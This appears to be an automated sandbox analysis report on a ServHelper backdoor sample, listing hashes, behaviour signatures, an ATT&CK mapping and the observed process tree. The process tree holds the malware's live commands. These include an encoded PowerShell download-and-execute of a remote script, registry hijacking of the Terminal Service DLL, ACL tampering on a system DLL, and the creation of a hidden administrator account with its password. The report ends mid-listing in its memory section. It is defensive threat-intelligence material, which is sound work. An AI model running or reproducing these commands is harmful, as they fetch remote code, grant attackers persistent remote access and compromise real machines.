Analysis

  • max time kernel
    130s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    10-04-2024 14:11

General

  • Target

    cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe

  • Size

    5.7MB

  • MD5

    63151e4f7c3972f18a23c0e9996e14ef

  • SHA1

    5d041fde6433a8ff8fc78a69fca1fd4630e3f270

  • SHA256

    cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

  • SHA512

    f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

  • SSDEEP

    49152:H+zcyKrb/T/vO90dL3BmAFd4A64nsfJdItom5VWIKvZeUW+EMioAnt64mtCvtEhq:H+nvKojmAQQQQQQQQQQQQQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe
    "C:\Users\Admin\AppData\Local\Temp\cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2508
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ofs6q8ks.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC38.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAC27.tmp"
          4⤵
            PID:2400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1780
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2100
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:604
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1612
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1648
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2788
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:704
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:592
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2088
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:528
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Sets DLL path for service in the registry
            • Modifies registry key
            PID:2800
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2052
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1476
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2540
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1708
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                      PID:1692
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        6⤵
                          PID:1348
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    3⤵
                      PID:1640
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start TermService
                        4⤵
                          PID:1064
                          • C:\Windows\system32\net.exe
                            net start TermService
                            5⤵
                              PID:1552
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start TermService
                                6⤵
                                  PID:2128
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                            3⤵
                              PID:1160
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                              3⤵
                                PID:1988
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe user WgaUtilAcc 000000 /del
                            1⤵
                              PID:1140
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc 000000 /del
                                2⤵
                                  PID:2832
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                                    3⤵
                                      PID:1340
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user WgaUtilAcc 8Jlx3RNw /add
                                  1⤵
                                    PID:2876
                                    • C:\Windows\system32\net.exe
                                      net.exe user WgaUtilAcc 8Jlx3RNw /add
                                      2⤵
                                        PID:3032
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user WgaUtilAcc 8Jlx3RNw /add
                                          3⤵
                                            PID:2284
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                        1⤵
                                          PID:2340
                                          • C:\Windows\system32\net.exe
                                            net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                            2⤵
                                              PID:712
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                3⤵
                                                  PID:900
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
                                              1⤵
                                                PID:884
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
                                                  2⤵
                                                    PID:1684
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
                                                      3⤵
                                                        PID:2968
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                    1⤵
                                                      PID:2448
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                        2⤵
                                                          PID:1760
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                                            3⤵
                                                              PID:2224
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe user WgaUtilAcc 8Jlx3RNw
                                                          1⤵
                                                            PID:1420
                                                            • C:\Windows\system32\net.exe
                                                              net.exe user WgaUtilAcc 8Jlx3RNw
                                                              2⤵
                                                                PID:2776
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user WgaUtilAcc 8Jlx3RNw
                                                                  3⤵
                                                                    PID:1864
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C wmic path win32_VideoController get name
                                                                1⤵
                                                                  PID:2936
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic path win32_VideoController get name
                                                                    2⤵
                                                                    • Detects videocard installed
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1752
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C wmic CPU get NAME
                                                                  1⤵
                                                                    PID:2632
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic CPU get NAME
                                                                      2⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2616
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "20424056601010562712684525421-742214191246008621-2966882191756620641-1930846302"
                                                                    1⤵
                                                                      PID:2544
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                      1⤵
                                                                        PID:2476
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          2⤵
                                                                            PID:1244
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                              3⤵
                                                                              • Blocklisted process makes network request
                                                                              • Drops file in Windows directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2412

                                                                        Network

                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                        Persistence

                                                                        Account Manipulation

                                                                        1
                                                                        T1098

                                                                        Boot or Logon Autostart Execution

                                                                        1
                                                                        T1547

                                                                        Registry Run Keys / Startup Folder

                                                                        1
                                                                        T1547.001

                                                                        Privilege Escalation

                                                                        Boot or Logon Autostart Execution

                                                                        1
                                                                        T1547

                                                                        Registry Run Keys / Startup Folder

                                                                        1
                                                                        T1547.001

                                                                        Defense Evasion

                                                                        Modify Registry

                                                                        2
                                                                        T1112

                                                                        File and Directory Permissions Modification

                                                                        1
                                                                        T1222

                                                                        Discovery

                                                                        System Information Discovery

                                                                        1
                                                                        T1082

                                                                        Lateral Movement

                                                                        Remote Services

                                                                        1
                                                                        T1021

                                                                        Remote Desktop Protocol

                                                                        1
                                                                        T1021.001

                                                                        Command and Control

                                                                        Web Service

                                                                        1
                                                                        T1102

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Temp\RESAC38.tmp
                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          6384ef3deae4da3cbb9c9bde58b2df0e

                                                                          SHA1

                                                                          f2fc708eb4dfe1e7fb53e1849ba21b39fd6baca0

                                                                          SHA256

                                                                          083fc7b4911f7c57759aeef159798a5581e9636ecc2f0acf0b1d0dbdd98ddecc

                                                                          SHA512

                                                                          c91dbdd7d3b062c0d2e2281918c594e79461bfe809d78a2fe2624ce35a988032647bcb5105428a5847914f0793bd80ae198c4276685f221b6a86beced3ce5b1a

                                                                        • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
                                                                          Filesize

                                                                          2.5MB

                                                                          MD5

                                                                          f783019c5dc4a5477d1ffd4f9f512979

                                                                          SHA1

                                                                          37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b

                                                                          SHA256

                                                                          4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348

                                                                          SHA512

                                                                          64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a

                                                                        • C:\Users\Admin\AppData\Local\Temp\ofs6q8ks.dll
                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          d8cff69d348c107621236b6b6eb62a9d

                                                                          SHA1

                                                                          d228abf42fdc211e80eb1e4b1a5eff92759cfed5

                                                                          SHA256

                                                                          4168a0533babfcb495cad611a842e3935a870c5053228eab96bea493792c2045

                                                                          SHA512

                                                                          baff7b709d5062749d8c1c30f9156287c78d53ccdca70602283a7735fae99e49dc3c416cb1502cdc10bcf040fae983b977e4b02caa1d4a33879cac060f3676cf

                                                                        • C:\Users\Admin\AppData\Local\Temp\ofs6q8ks.pdb
                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          b425affd3070b3db0a561b3cf246c3e7

                                                                          SHA1

                                                                          92df13db327f9e08adfda7a6ffc09f429739c4d7

                                                                          SHA256

                                                                          1824610bd3dd351ce02e47f0db6babe0249eba601195e3e6f561b65d6c18e8fd

                                                                          SHA512

                                                                          d2a97dbb9e2a9b6592d997c17d7ad683ee0b9df3f8b7ebf77fb80378160b5d1e1d8a8895e842296e2a73ef6c20d00b6ce7f99ca036f83270b6f1c048946197e7

                                                                        • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          28d9755addec05c0b24cca50dfe3a92b

                                                                          SHA1

                                                                          7d3156f11c7a7fb60d29809caf93101de2681aa3

                                                                          SHA256

                                                                          abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                                                          SHA512

                                                                          891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R2662K86D6U2V7NTU3X0.temp
                                                                          Filesize

                                                                          7KB

                                                                          MD5

                                                                          f886b4ba6293daa9f089b1f869acfc24

                                                                          SHA1

                                                                          d96d7f811f9d9eaab342d112fe61c3d48d7a7a08

                                                                          SHA256

                                                                          912112eae5ddc8c0491fa1230196167ed98ab7bf01252c9ee3c8d3092e8fa9a6

                                                                          SHA512

                                                                          7689a2512e0c7ef788c6b3abc74e442b8ae7dfe7be7b530dc51552e3f35c6d65cf2af2bcead18402864806c892864573cbf288f21728f048c2938e541fcf9598

                                                                        • C:\Windows\system32\rfxvmt.dll
                                                                          Filesize

                                                                          40KB

                                                                          MD5

                                                                          dc39d23e4c0e681fad7a3e1342a2843c

                                                                          SHA1

                                                                          58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                          SHA256

                                                                          6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                          SHA512

                                                                          5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                        • \??\PIPE\samr
                                                                          MD5

                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                          SHA1

                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                          SHA256

                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                          SHA512

                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\CSCAC27.tmp
                                                                          Filesize

                                                                          652B

                                                                          MD5

                                                                          0ce6cbbcef033e567e49e81230fc2341

                                                                          SHA1

                                                                          6c2b135adcc18597e2c23a6b05dd49ab06adb409

                                                                          SHA256

                                                                          41e5d7ec3b919b4786926f3fc5e98c073b89d8caff2441dcc1a0b352297079b9

                                                                          SHA512

                                                                          97ff6c1f9bb0a5c9f1fad447d45a86a59d1b371954caf99d3473b374d2c19d21dc9f39527bb038e6916fe7acddde8b210cffdf010a9d65eb28b42284299951bb

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\ofs6q8ks.0.cs
                                                                          Filesize

                                                                          424B

                                                                          MD5

                                                                          9f8ab7eb0ab21443a2fe06dab341510e

                                                                          SHA1

                                                                          2b88b3116a79e48bab7114e18c9b9674e8a52165

                                                                          SHA256

                                                                          e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                                                          SHA512

                                                                          53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\ofs6q8ks.cmdline
                                                                          Filesize

                                                                          309B

                                                                          MD5

                                                                          d7648f799a1f48da09219c27ba6a66ea

                                                                          SHA1

                                                                          ba9ef201ad73d66899a25442c47d1d2e827c2956

                                                                          SHA256

                                                                          7178547dcae3cb88a437682ae91b73ff81bfe92c1db37d2742906dcb5dfa023a

                                                                          SHA512

                                                                          96c2a4963724d3b41ee24d44894427e99a44b75b88ad95c7ff5784f978c15c2cdd57fd4adbc6ebbdc42320860543eb42ef2a11acdf9a791a112b3be2a6ae0def

                                                                        • \Windows\Branding\mediasrv.png
                                                                          Filesize

                                                                          60KB

                                                                          MD5

                                                                          ac13d804585a74dc542db4ec94da39df

                                                                          SHA1

                                                                          8642ae2e04e492700caf41b43de9ef9d8b3c26f9

                                                                          SHA256

                                                                          84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55

                                                                          SHA512

                                                                          0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf

                                                                        • \Windows\Branding\mediasvc.png
                                                                          Filesize

                                                                          743KB

                                                                          MD5

                                                                          9151c95451abb048a44f98d0afac8264

                                                                          SHA1

                                                                          22f447b210eb25c11be5a9c31f254f5f2bd50a78

                                                                          SHA256

                                                                          8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518

                                                                          SHA512

                                                                          728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13

                                                                        • memory/1060-65-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1060-66-0x00000000024F0000-0x0000000002570000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1060-64-0x00000000024F0000-0x0000000002570000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1060-69-0x00000000024FC000-0x0000000002563000-memory.dmp
                                                                          Filesize

                                                                          412KB

                                                                        • memory/1060-67-0x00000000024F0000-0x0000000002570000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1060-68-0x00000000024F0000-0x0000000002570000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1060-62-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1060-71-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1736-5-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-47-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-38-0x000007FEF5310000-0x000007FEF5CFC000-memory.dmp
                                                                          Filesize

                                                                          9.9MB

                                                                        • memory/1736-1-0x000007FEF5310000-0x000007FEF5CFC000-memory.dmp
                                                                          Filesize

                                                                          9.9MB

                                                                        • memory/1736-0-0x0000000041700000-0x0000000041B04000-memory.dmp
                                                                          Filesize

                                                                          4.0MB

                                                                        • memory/1736-63-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-3-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-2-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-4-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1736-53-0x0000000041180000-0x0000000041200000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1780-82-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1780-84-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1780-80-0x00000000026B4000-0x00000000026B7000-memory.dmp
                                                                          Filesize

                                                                          12KB

                                                                        • memory/1780-81-0x00000000026BC000-0x0000000002723000-memory.dmp
                                                                          Filesize

                                                                          412KB

                                                                        • memory/1780-79-0x00000000026B0000-0x0000000002730000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1780-78-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1808-55-0x00000000025F0000-0x0000000002670000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1808-56-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1808-52-0x00000000025F0000-0x0000000002670000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1808-54-0x00000000025F0000-0x0000000002670000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1808-51-0x00000000025F0000-0x0000000002670000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1808-50-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/1808-49-0x00000000025F0000-0x0000000002670000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/1808-48-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2412-117-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2412-116-0x0000000001110000-0x0000000001190000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2412-115-0x0000000001110000-0x0000000001190000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2412-113-0x0000000001110000-0x0000000001190000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2412-114-0x0000000001110000-0x0000000001190000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2412-112-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2412-111-0x0000000001110000-0x0000000001190000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2412-110-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2508-85-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2508-15-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-17-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-16-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2508-87-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-86-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-89-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-13-0x0000000001D40000-0x0000000001D48000-memory.dmp
                                                                          Filesize

                                                                          32KB

                                                                        • memory/2508-14-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2508-83-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-20-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-18-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-34-0x000000001B610000-0x000000001B618000-memory.dmp
                                                                          Filesize

                                                                          32KB

                                                                        • memory/2508-39-0x0000000002890000-0x0000000002910000-memory.dmp
                                                                          Filesize

                                                                          512KB

                                                                        • memory/2508-76-0x000007FEEC890000-0x000007FEED22D000-memory.dmp
                                                                          Filesize

                                                                          9.6MB

                                                                        • memory/2508-77-0x0000000002890000-0x0000000002910000-memory.dmp
